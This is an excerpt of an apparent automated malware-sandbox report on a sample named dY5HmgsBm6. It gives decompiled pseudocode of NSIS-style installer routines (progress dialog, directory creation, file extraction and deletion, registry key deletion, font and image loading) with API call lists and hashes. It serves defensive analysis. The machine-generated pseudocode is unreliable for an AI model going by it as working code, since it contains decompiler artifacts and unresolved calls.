                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                        • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                        • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                        				char _v68;
                                                        				int _t11;
                                                        				int _t20;
                                                        
                                                        				if(_a8 == 0x110) {
                                                        					SetTimer(_a4, 1, 0xfa, 0);
                                                        					_a8 = 0x113;
                                                        				}
                                                        				if(_a8 == 0x113) {
                                                        					_t20 =  *0x41d440; // 0x27469f
                                                        					_t11 =  *0x42944c; // 0x2746a3
                                                        					if(_t20 >= _t11) {
                                                        						_t20 = _t11;
                                                        					}
                                                        					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                        					SetWindowTextA(_a4,  &_v68);
                                                        					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                        				}
                                                        				return 0;
                                                        			}






                                                        0x00402dc7
                                                        0x00402dd5
                                                        0x00402ddb
                                                        0x00402ddb
                                                        0x00402de9
                                                        0x00402deb
                                                        0x00402df1
                                                        0x00402df8
                                                        0x00402dfa
                                                        0x00402dfa
                                                        0x00402e10
                                                        0x00402e20
                                                        0x00402e32
                                                        0x00402e32
                                                        0x00402e3a

                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                        • MulDiv.KERNEL32(0027469F,00000064,002746A3), ref: 00402E00
                                                        • wsprintfA.USER32 ref: 00402E10
                                                        • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                        • SetDlgItemTextA.USER32 ref: 00402E32
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 00402E0A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                        • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                        • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                        • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004056E4(CHAR* _a4) {
                                                        				struct _SECURITY_ATTRIBUTES _v16;
                                                        				struct _SECURITY_DESCRIPTOR _v36;
                                                        				long _t23;
                                                        
                                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                        				_v36.Owner = 0x408384;
                                                        				_v36.Group = 0x408384;
                                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                        				_v16.lpSecurityDescriptor =  &_v36;
                                                        				_v36.Revision = 1;
                                                        				_v36.Control = 4;
                                                        				_v36.Dacl = 0x408374;
                                                        				_v16.nLength = 0xc;
                                                        				if(CreateDirectoryA(_a4,  &_v16) != 0) {
                                                        					L1:
                                                        					return 0;
                                                        				}
                                                        				_t23 = GetLastError();
                                                        				if(_t23 == 0xb7) {
                                                        					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                        						goto L1;
                                                        					}
                                                        					return GetLastError();
                                                        				}
                                                        				return _t23;
                                                        			}






                                                        0x004056ef
                                                        0x004056f3
                                                        0x004056f6
                                                        0x004056fc
                                                        0x00405700
                                                        0x00405704
                                                        0x0040570c
                                                        0x00405713
                                                        0x00405719
                                                        0x00405720
                                                        0x0040572f
                                                        0x00405731
                                                        0x00000000
                                                        0x00405731
                                                        0x0040573b
                                                        0x00405742
                                                        0x00405758
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040575a
                                                        0x0040575e

                                                        APIs
                                                        • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                        • GetLastError.KERNEL32 ref: 0040573B
                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                        • GetLastError.KERNEL32 ref: 0040575A
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                        • C:\Users\user\Desktop, xrefs: 004056E4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                        • API String ID: 3449924974-1229045261
                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                        • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                        • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 37%
                                                        			E004027DF(void* __ebx) {
                                                        				void* _t26;
                                                        				long _t31;
                                                        				void* _t45;
                                                        				void* _t49;
                                                        				void* _t51;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        				void* _t56;
                                                        
                                                        				_t45 = __ebx;
                                                        				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                        				_t50 = E00402BCE(0xfffffff0);
                                                        				 *(_t56 - 0x78) = _t23;
                                                        				if(E00405AFC(_t50) == 0) {
                                                        					E00402BCE(0xffffffed);
                                                        				}
                                                        				E00405C6B(_t50);
                                                        				_t26 = E00405C90(_t50, 0x40000000, 2);
                                                        				 *(_t56 + 8) = _t26;
                                                        				if(_t26 != 0xffffffff) {
                                                        					_t31 =  *0x42f438;
                                                        					 *(_t56 - 0x30) = _t31;
                                                        					_t49 = GlobalAlloc(0x40, _t31);
                                                        					if(_t49 != _t45) {
                                                        						E00403300(_t45);
                                                        						E004032EA(_t49,  *(_t56 - 0x30));
                                                        						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                        						 *(_t56 - 0x38) = _t54;
                                                        						if(_t54 != _t45) {
                                                        							_push( *(_t56 - 0x20));
                                                        							_push(_t54);
                                                        							_push(_t45);
                                                        							_push( *((intOrPtr*)(_t56 - 0x24)));
                                                        							E004030D8();
                                                        							while( *_t54 != _t45) {
                                                        								_t47 =  *_t54;
                                                        								_t55 = _t54 + 8;
                                                        								 *(_t56 - 0x8c) =  *_t54;
                                                        								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                        								_t54 = _t55 +  *(_t56 - 0x8c);
                                                        							}
                                                        							GlobalFree( *(_t56 - 0x38));
                                                        						}
                                                        						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                        						GlobalFree(_t49);
                                                        						_push(_t45);
                                                        						_push(_t45);
                                                        						_push( *(_t56 + 8));
                                                        						_push(0xffffffff);
                                                        						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8();
                                                        					}
                                                        					CloseHandle( *(_t56 + 8));
                                                        				}
                                                        				_t51 = 0xfffffff3;
                                                        				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                        					_t51 = 0xffffffef;
                                                        					DeleteFileA( *(_t56 - 0x78));
                                                        					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                        				}
                                                        				_push(_t51);
                                                        				E00401423();
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
                                                        				return 0;
                                                        			}











                                                        0x004027df
                                                        0x004027e1
                                                        0x004027ed
                                                        0x004027f0
                                                        0x004027fa
                                                        0x004027fe
                                                        0x004027fe
                                                        0x00402804
                                                        0x00402811
                                                        0x00402819
                                                        0x0040281c
                                                        0x00402822
                                                        0x00402830
                                                        0x00402835
                                                        0x00402839
                                                        0x0040283c
                                                        0x00402845
                                                        0x00402851
                                                        0x00402855
                                                        0x00402858
                                                        0x0040285a
                                                        0x0040285d
                                                        0x0040285e
                                                        0x0040285f
                                                        0x00402862
                                                        0x00402887
                                                        0x00402869
                                                        0x0040286e
                                                        0x00402876
                                                        0x0040287c
                                                        0x00402881
                                                        0x00402881
                                                        0x0040288e
                                                        0x0040288e
                                                        0x0040289b
                                                        0x004028a1
                                                        0x004028a7
                                                        0x004028a8
                                                        0x004028a9
                                                        0x004028ac
                                                        0x004028b3
                                                        0x004028b3
                                                        0x004028b9
                                                        0x004028b9
                                                        0x004028c4
                                                        0x004028c5
                                                        0x004028c9
                                                        0x004028cd
                                                        0x004028d3
                                                        0x004028d3
                                                        0x004028da
                                                        0x004022dd
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                        • GlobalFree.KERNEL32 ref: 0040288E
                                                        • GlobalFree.KERNEL32 ref: 004028A1
                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                        • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                        • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                        • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 77%
                                                        			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                        				char _v36;
                                                        				char _v68;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t21;
                                                        				signed int _t22;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t32;
                                                        				void* _t41;
                                                        				signed int _t43;
                                                        				signed int _t47;
                                                        				signed int _t50;
                                                        				signed int _t51;
                                                        				signed int _t53;
                                                        
                                                        				_t21 = _a16;
                                                        				_t51 = _a12;
                                                        				_t41 = 0xffffffdc;
                                                        				if(_t21 == 0) {
                                                        					_push(0x14);
                                                        					_pop(0);
                                                        					_t22 = _t51;
                                                        					if(_t51 < 0x100000) {
                                                        						_push(0xa);
                                                        						_pop(0);
                                                        						_t41 = 0xffffffdd;
                                                        					}
                                                        					if(_t51 < 0x400) {
                                                        						_t41 = 0xffffffde;
                                                        					}
                                                        					if(_t51 < 0xffff3333) {
                                                        						_t50 = 0x14;
                                                        						asm("cdq");
                                                        						_t22 = 1 / _t50 + _t51;
                                                        					}
                                                        					_t23 = _t22 & 0x00ffffff;
                                                        					_t53 = _t22 >> 0;
                                                        					_t43 = 0xa;
                                                        					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                        				} else {
                                                        					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                        					_t47 = 0;
                                                        				}
                                                        				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                        				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
                                                        				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
                                                        				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                        				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
                                                        			}



















                                                        0x004049ca
                                                        0x004049cf
                                                        0x004049d7
                                                        0x004049d8
                                                        0x004049e5
                                                        0x004049ed
                                                        0x004049ee
                                                        0x004049f0
                                                        0x004049f2
                                                        0x004049f4
                                                        0x004049f7
                                                        0x004049f7
                                                        0x004049fe
                                                        0x00404a04
                                                        0x00404a04
                                                        0x00404a0b
                                                        0x00404a12
                                                        0x00404a15
                                                        0x00404a18
                                                        0x00404a18
                                                        0x00404a1c
                                                        0x00404a2c
                                                        0x00404a2e
                                                        0x00404a31
                                                        0x004049da
                                                        0x004049da
                                                        0x004049e1
                                                        0x004049e1
                                                        0x00404a39
                                                        0x00404a44
                                                        0x00404a5a
                                                        0x00404a6a
                                                        0x00404a86

                                                        APIs
                                                        • lstrlenA.KERNEL32(Name Setup: Completed,Name Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                        • wsprintfA.USER32 ref: 00404A6A
                                                        • SetDlgItemTextA.USER32 ref: 00404A7D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$Name Setup: Completed
                                                        • API String ID: 3540041739-970259760
                                                        • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                        • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                        • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                        • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 48%
                                                        			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                        				void* _v8;
                                                        				int _v12;
                                                        				char _v276;
                                                        				void* _t27;
                                                        				signed int _t33;
                                                        				intOrPtr* _t35;
                                                        				signed int _t45;
                                                        				signed int _t46;
                                                        				signed int _t47;
                                                        
                                                        				_t46 = _a12;
                                                        				_t47 = _t46 & 0x00000300;
                                                        				_t45 = _t46 & 0x00000001;
                                                        				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                        				if(_t27 == 0) {
                                                        					if((_a12 & 0x00000002) == 0) {
                                                        						L3:
                                                        						_push(0x105);
                                                        						_push( &_v276);
                                                        						_push(0);
                                                        						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                        							__eflags = _t45;
                                                        							if(__eflags != 0) {
                                                        								L10:
                                                        								RegCloseKey(_v8);
                                                        								return 0x3eb;
                                                        							}
                                                        							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                        							__eflags = _t33;
                                                        							if(_t33 != 0) {
                                                        								break;
                                                        							}
                                                        							_push(0x105);
                                                        							_push( &_v276);
                                                        							_push(_t45);
                                                        						}
                                                        						RegCloseKey(_v8);
                                                        						_t35 = E00406500(3);
                                                        						if(_t35 != 0) {
                                                        							return  *_t35(_a4, _a8, _t47, 0);
                                                        						}
                                                        						return RegDeleteKeyA(_a4, _a8);
                                                        					}
                                                        					_v12 = 0;
                                                        					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                        						goto L10;
                                                        					}
                                                        					goto L3;
                                                        				}
                                                        				return _t27;
                                                        			}












                                                        0x00402cdb
                                                        0x00402ce4
                                                        0x00402ced
                                                        0x00402cf9
                                                        0x00402d02
                                                        0x00402d0c
                                                        0x00402d31
                                                        0x00402d37
                                                        0x00402d3c
                                                        0x00402d3d
                                                        0x00402d6d
                                                        0x00402d46
                                                        0x00402d48
                                                        0x00402d98
                                                        0x00402d9b
                                                        0x00000000
                                                        0x00402da1
                                                        0x00402d57
                                                        0x00402d5c
                                                        0x00402d5e
                                                        0x00000000
                                                        0x00000000
                                                        0x00402d66
                                                        0x00402d6b
                                                        0x00402d6c
                                                        0x00402d6c
                                                        0x00402d79
                                                        0x00402d81
                                                        0x00402d88
                                                        0x00000000
                                                        0x00402db1
                                                        0x00000000
                                                        0x00402d90
                                                        0x00402d1c
                                                        0x00402d2f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402d2f
                                                        0x00402db7

                                                        APIs
                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                        • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                        • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                        • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 77%
                                                        			E00401D65(void* __ebx, void* __edx) {
                                                        				struct HWND__* _t30;
                                                        				CHAR* _t38;
                                                        				void* _t48;
                                                        				void* _t53;
                                                        				signed int _t55;
                                                        				signed int _t58;
                                                        				long _t61;
                                                        				void* _t65;
                                                        
                                                        				_t53 = __ebx;
                                                        				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                        				} else {
                                                        					E00402BAC(2);
                                                        					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                        				}
                                                        				_t55 =  *(_t65 - 0x1c);
                                                        				 *(_t65 + 8) = _t30;
                                                        				_t58 = _t55 & 0x00000004;
                                                        				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                        				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                        				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                        				if((_t55 & 0x00010000) == 0) {
                                                        					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                        				} else {
                                                        					_t38 = E00402BCE(0x11);
                                                        				}
                                                        				 *(_t65 - 8) = _t38;
                                                        				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                        				asm("sbb edi, edi");
                                                        				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                        				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                        				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                        					DeleteObject(_t48);
                                                        				}
                                                        				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                        					_push(_t61);
                                                        					E00406055();
                                                        				}
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
                                                        				return 0;
                                                        			}











                                                        0x00401d65
                                                        0x00401d69
                                                        0x00401d7e
                                                        0x00401d6b
                                                        0x00401d6d
                                                        0x00401d73
                                                        0x00401d73
                                                        0x00401d84
                                                        0x00401d87
                                                        0x00401d91
                                                        0x00401d94
                                                        0x00401d9c
                                                        0x00401dad
                                                        0x00401db0
                                                        0x00401dbb
                                                        0x00401db2
                                                        0x00401db4
                                                        0x00401db4
                                                        0x00401dbf
                                                        0x00401dcc
                                                        0x00401df3
                                                        0x00401e02
                                                        0x00401e10
                                                        0x00401e18
                                                        0x00401e20
                                                        0x00401e20
                                                        0x00401e29
                                                        0x00401e2f
                                                        0x004029a5
                                                        0x004029a5
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                        • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                        • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                        • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E00401E35(intOrPtr __edx) {
                                                        				void* __esi;
                                                        				int _t9;
                                                        				signed char _t15;
                                                        				struct HFONT__* _t18;
                                                        				intOrPtr _t30;
                                                        				struct HDC__* _t31;
                                                        				void* _t33;
                                                        				void* _t35;
                                                        
                                                        				_t30 = __edx;
                                                        				_t31 = GetDC( *(_t35 - 8));
                                                        				_t9 = E00402BAC(2);
                                                        				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                        				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                        				ReleaseDC( *(_t35 - 8), _t31);
                                                        				 *0x40b848 = E00402BAC(3);
                                                        				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                        				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                        				 *0x40b84f = 1;
                                                        				 *0x40b84c = _t15 & 0x00000001;
                                                        				 *0x40b84d = _t15 & 0x00000002;
                                                        				 *0x40b84e = _t15 & 0x00000004;
                                                        				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
                                                        				_t18 = CreateFontIndirectA(0x40b838);
                                                        				_push(_t18);
                                                        				_push(_t33);
                                                        				E00406055();
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
                                                        				return 0;
                                                        			}











                                                        0x00401e35
                                                        0x00401e40
                                                        0x00401e42
                                                        0x00401e4f
                                                        0x00401e66
                                                        0x00401e6b
                                                        0x00401e78
                                                        0x00401e7d
                                                        0x00401e81
                                                        0x00401e8c
                                                        0x00401e93
                                                        0x00401ea5
                                                        0x00401eab
                                                        0x00401eb0
                                                        0x00401eba
                                                        0x00402620
                                                        0x00401569
                                                        0x004029a5
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E38
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                        • ReleaseDC.USER32 ref: 00401E6B
                                                        • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID:
